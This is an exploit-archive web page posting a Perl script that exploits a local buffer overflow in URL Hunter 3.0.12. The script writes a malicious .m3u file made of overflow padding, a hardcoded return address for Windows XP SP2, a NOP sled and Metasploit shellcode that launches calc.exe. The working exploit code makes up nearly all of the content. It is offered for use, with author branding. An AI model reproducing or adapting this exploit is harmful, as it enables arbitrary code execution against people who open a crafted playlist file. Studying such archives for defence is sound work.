exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

URL Hunter 3.0.12 Buffer Overflow

URL Hunter 3.0.12 Buffer Overflow
Posted Aug 28, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

URL Hunter version 3.0.12 local buffer overflow exploit that creates a malicious .m3u file.

tags | exploit, overflow, local
SHA-256 | ca6b4a0d26265c8049209a8779682371dc0cac82464854abf4c3393379350dc6

URL Hunter 3.0.12 Buffer Overflow

Change Mirror Download
=============================================================
URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit
=============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


#!/usr/bin/perl
#URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit
#download : http://www.rm-to-mp3.net/downloads/urlhuntersetup.exe

my $crash= "A" x 26039;

#created by opt!x hacker

####run software clic on stop to be start and get m3u file into the sof and
boom calc executed####
#you can change the ret adress as you need
#this exploit work wit me without any header

# shellcode executes calc.exe from metasploit project Size=160 --
Encoder=PexFnstenvSub
my $shellcode=

"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".

"\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".

"\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".

"\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".

"\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".

"\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".

"\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".

"\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".

"\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".

"\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";


my $ret = "\x68\xD5\x85\x7C"; # 0x7C85D568 call esp from kernel32.dll
in windows xp pro SP2 fr
my $nop = "\x90" x 10;
open(m3u,">>youssef.m3u");

print m3u $crash.$ret.$nop.$shellcode;
print "[+] Done !! [+]";
close(m3u);

---------------------------------

ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~ - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close